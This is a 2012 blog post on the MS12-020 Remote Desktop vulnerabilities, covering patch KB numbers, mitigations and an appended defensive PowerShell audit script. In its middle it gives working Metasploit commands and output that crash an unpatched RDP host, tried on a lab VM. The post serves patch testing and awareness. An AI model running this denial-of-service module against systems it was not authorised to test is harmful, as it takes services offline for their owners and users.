25 March 2012

[Security] MS12-020 RDP Vulnerability overview and testing



By now, if you have been paying attention to your news reader, Google Plus or Twitter feed, you will have noticed that Microsoft released a patch for a nasty denial of service (DoS) vulnerability. Here is a bit of information about the vulnerability from Microsoft's description: “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”

In short, the system would crash with a “blue screen of death” and reboot. The other vulnerability would allow an attacker to gain remote code execution on the affected system. Even though this patch was released over two weeks ago, most organizations are still vulnerable, and that is not because they choose to be; most places have a “patch cycle” that requires extensive testing prior to deployment.
As explained by the fine people over at the ISC Diary, the Microsoft patch has several reference KBs, which include KB2671387 (Remote Code Execution – CVE-2012-0002) and KB2667402 (Denial of Service – CVE-2012-0152) or KB2621440. The reference for the update you’ll see on a Windows system, when installed, depends on the version of the OS you’re running. For Windows 7 you’ll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host. As always, before applying any patch, ensure that you read the release notes.
We recently patched our internet-facing servers that had RDP enabled, and everything went well with the exception of one server that we were unable to log back into via RDP. We had to gain access to the server via the iLO port, apply a few additional patches and reboot, which seemed to solve the issue. Now for the fun part: if you would like to test the proof-of-concept exploit for this vulnerability, grab a copy of Metasploit and follow the steps below.
My Test setup:

Linux (SolusOS)
VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.2.10:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.2.10:3389 - 210 bytes sent
[*] 192.168.2.10:3389 - Checking RDP status...
[+] 192.168.2.10:3389 seems down
[*] Auxiliary module execution completed

RHOST = the target host running an unpatched (vulnerable) version of RDP
[Screenshot: Windows Server 2008 reacting to the exploit]

Now go on out and patch your systems, and if you have some time, load Metasploit on a host of your choice and do some testing.

Mitigation:
If you don’t need RDP open to the external world, disable it.
Change the default port; everyone knows it’s 3389 (this only cuts down on scanning noise and is no substitute for the patch).
Enable Network Level Authentication (NLA).
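A quick way to check a host against the points above, as an added example that is not part of the original post: the PowerShell below looks up the three KB numbers mentioned earlier in the installed-hotfix list and reads the standard Terminal Server registry values for whether RDP is enabled, which port it listens on, and whether NLA is enforced. It assumes Windows PowerShell 2.0 or later run locally with administrative rights; the function name Get-Ms12020Status is my own.

```powershell
# Added example (not from the original post): audit one Windows host for the
# MS12-020 state described above. Assumes Windows PowerShell 2.0 or later,
# run locally as an administrator.

# KB numbers as listed in the post; which one applies depends on the OS version.
$Ms12020Kbs = 'KB2621440', 'KB2667402', 'KB2671387'

function Get-Ms12020Status {
    $tsRoot = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdpTcp = Join-Path $tsRoot 'WinStations\RDP-Tcp'

    # Get-HotFix reads Win32_QuickFixEngineering; an update installed through
    # another channel may not appear here, so "none" means "verify another way".
    $installed = @(Get-HotFix -Id $Ms12020Kbs -ErrorAction SilentlyContinue |
                   Select-Object -ExpandProperty HotFixID)

    $ts  = Get-ItemProperty -Path $tsRoot -ErrorAction SilentlyContinue
    $tcp = Get-ItemProperty -Path $rdpTcp -ErrorAction SilentlyContinue

    New-Object PSObject -Property @{
        ComputerName   = $env:COMPUTERNAME
        Ms12020KbFound = if ($installed) { $installed -join ',' } else { 'none' }
        RdpEnabled     = ($ts.fDenyTSConnections -eq 0)    # 1 = connections denied
        RdpPort        = $tcp.PortNumber                   # default is 3389
        NlaRequired    = ($tcp.UserAuthentication -eq 1)   # 1 = NLA enforced
    }
}

$status = Get-Ms12020Status
$status | Format-List ComputerName, Ms12020KbFound, RdpEnabled, RdpPort, NlaRequired

# Flag the combination the post warns about: RDP on, no MS12-020 KB, no NLA.
if ($status.RdpEnabled -and $status.Ms12020KbFound -eq 'none') {
    Write-Warning 'RDP is enabled and no MS12-020 KB was found; patch or restrict access.'
    if (-not $status.NlaRequired) {
        Write-Warning 'NLA is not enforced; enabling it is one of the mitigations above.'
    }
}
```

Run it on each RDP-enabled host before and after the patch cycle to confirm the KB actually landed rather than relying on the deployment tool's report.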

http://isc.sans.edu/diary.html?storyid=12808

http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids

http://technet.microsoft.com/en-us/library/cc732713.aspx
Via securegossip
